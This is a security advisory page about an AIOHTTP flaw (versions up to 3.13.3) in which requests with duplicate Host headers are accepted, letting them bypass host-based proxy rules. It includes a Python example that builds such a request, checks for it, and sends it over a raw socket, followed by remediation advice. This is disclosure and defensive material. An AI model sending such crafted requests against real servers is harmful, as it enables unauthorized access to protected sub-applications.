AIOHTTP Duplicate Host Header Vulnerability Allowing Potential Access Control Bypass

Vulnerability

A vulnerability in AIOHTTP, an asynchronous HTTP client/server framework for Python, allows the server to accept HTTP/1.1 requests that carry more than one Host header in versions up to and including 3.13.3. HTTP/1.1 (RFC 9112 §3.2) requires such requests to be rejected with 400; a server that accepts them instead can disagree with a reverse proxy in front of it about which Host value is authoritative. A proxy that applies host-based rules to one value while the backend routes on another can therefore let a request through to a privileged sub-application that the proxy believed it had blocked. The issue has been fixed in AIOHTTP version 3.13.4.

Impact

A host-based access control bypass: a request that a Host-based rule in front of the server was meant to block can be processed by a privileged sub-application behind it, for example one registered with 'Application.add_domain()'.

Reproduction

To reproduce, send an HTTP/1.1 request containing two Host header lines to a server running AIOHTTP 3.13.3 or earlier. The request can be built with cURL or Postman, or with a short script using the AIOHTTP client, but confirm on the wire (a raw socket or a packet capture) that both Host lines are actually transmitted: many clients and intermediaries merge or drop duplicate headers, which hides the condition. To demonstrate the access control bypass rather than just the acceptance of the request, register a privileged sub-application with 'Application.add_domain()' for a restricted host name, put a Host-checking reverse proxy in front of the server, and observe whether a request whose first Host value satisfies the proxy and whose second names the restricted domain reaches the sub-application.
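The request described above and the check that should stop it, as an added example that is not part of this advisory or of AIOHTTP's own code. It assembles a raw HTTP/1.1 request with two Host lines (the host names 'public.example' and 'admin.example' are constructed for illustration), classifies the Host header(s) of a request the way a proxy or server should before forwarding it, and keeps a raw-socket sender so the bytes reach the server unmodified. Only 'send_raw' touches the network, against a test server you supply; everything else runs offline.

```python
"""Added example (not AIOHTTP's code): build a duplicate-Host HTTP/1.1 request
and apply the RFC 9112 section 3.2 check that a reverse proxy or server should
perform: a request with more than one Host field line gets a 400 response."""
import socket
from typing import Optional


def build_request(path: str, hosts: list, method: str = "GET") -> bytes:
    """Serialize a minimal HTTP/1.1 request with one Host line per entry in
    `hosts`. Two entries give the duplicate-Host request this advisory is about."""
    lines = [f"{method} {path} HTTP/1.1"]
    lines += [f"Host: {h}" for h in hosts]
    lines += ["Connection: close", "", ""]
    return "\r\n".join(lines).encode("ascii")


def parse_headers(raw: bytes) -> tuple:
    """Split a raw request into its request line and an ordered list of
    (name, value) pairs, preserving duplicates instead of collapsing them."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in header_lines:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip().lower(), value.strip()))
    return request_line, headers


def host_header_status(raw: bytes) -> str:
    """Classify the Host header(s): 'ok', 'missing' or 'duplicate'.
    Anything but 'ok' should be answered with 400 and never forwarded."""
    _, headers = parse_headers(raw)
    hosts = [v for n, v in headers if n == "host"]
    if not hosts:
        return "missing"
    if len(hosts) > 1:
        return "duplicate"
    return "ok"


def first_and_last_host(raw: bytes) -> tuple:
    """Return the first and last Host values. A proxy that validates one while
    the backend routes on the other is the disagreement the advisory describes."""
    _, headers = parse_headers(raw)
    hosts = [v for n, v in headers if n == "host"]
    return (hosts[0], hosts[-1]) if hosts else (None, None)


def send_raw(address: tuple, raw: bytes, timeout: float = 5.0) -> bytes:
    """Send the bytes over a plain TCP socket, so no client library can merge
    or drop the duplicate header, and return the response. Use only against a
    test server you control; not invoked when this module is imported."""
    with socket.create_connection(address, timeout=timeout) as sock:
        sock.sendall(raw)
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


# Constructed sample: the proxy expects "public.example"; the privileged
# sub-application registered with add_domain() answers to "admin.example".
DUPLICATE_HOST_REQUEST = build_request("/", ["public.example", "admin.example"])
SINGLE_HOST_REQUEST = build_request("/", ["public.example"])

if __name__ == "__main__":
    print(host_header_status(SINGLE_HOST_REQUEST))      # ok
    print(host_header_status(DUPLICATE_HOST_REQUEST))   # duplicate
    print(first_and_last_host(DUPLICATE_HOST_REQUEST))  # ('public.example', 'admin.example')
    # Against a local test server: print(send_raw(("127.0.0.1", 8080), DUPLICATE_HOST_REQUEST))
```

Run it as a script to see the classification; to probe a server, call 'send_raw' with the address of an instance you control and compare the response of a 3.13.3 build against 3.13.4. The parser deliberately keeps headers as an ordered list rather than a dict, because a dict silently keeps only one value and would reintroduce exactly the ambiguity being detected.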

Remediation

Upgrade to AIOHTTP version 3.13.4 or later, where this vulnerability has been patched and requests carrying more than one Host header are no longer accepted. Until the upgrade is deployed, configure the reverse proxy to reject such requests itself with 400 rather than forwarding them, as HTTP/1.1 requires, and do not rely on a Host check performed only at the proxy to protect sub-applications registered with 'Application.add_domain()'.

Added: Apr 1, 2026, 9:45 PM
Updated: Apr 1, 2026, 9:45 PM

Vulnerability Rating

Custom Algorithm
spread: 7.3
impact: 5.0
exploitability: 8.0
remediation: 7.7
relevance: 5.1
threat: 4.8
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.